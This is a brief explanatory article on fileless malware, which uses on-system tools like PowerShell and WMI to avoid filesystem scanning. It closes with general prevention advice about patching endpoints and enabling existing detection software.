It is true that just like organizations adapt, so too do criminals. What modern criminals in their right mind would attempt robbing a Brink’s truck on horseback? While that strategy might have worked well in the days of the Pony Express, attempting it in now would be out of touch and inefficient. Criminals adapt to keep pace in the same way organizations adapt. With the help of advance technology techniques, criminals advancing their mode of attacks just like organizations for conducting business.
One of the more recent developments in attacker tradecraft is fileless malware. This trend emerged a few years ago but gained significant prominence in late 2016 and throughout 2017. It refers to malware that is designed specifically and architected to not require or in fact interact with at all the filesystem of the host on which it runs. It is important for technology pros to be alert to this, because it impacts them in several different ways.
First, it alters what they should watch for when analyzing attacker activity. It requires looking for different indicators, because it has different characteristics than traditional malware. Second, it impacts practitioners plan and execute their response to a malware. Attackers use this method because it circumvents many of techniques that are used to mitigate attacks.
It is referred as a “non-malware,” fileless malware leverages on-system tools such as PowerShell, macros, Windows Management Instrumentation or other on-system scripting functionality to propagate, execute and perform whatever tasks it was developed to perform. By design, an attacker employing this technique will refrain from writing information to the filesystem. Because the primary defense strategy for detecting malicious code is file scanning.
To prevent this malware attack you have to follow these steps. First is patching and maintaining hard end point. Another step is to get the most from the malware detection and prevention software that already is in place. Turning it on is a useful starting point if you have not already done so.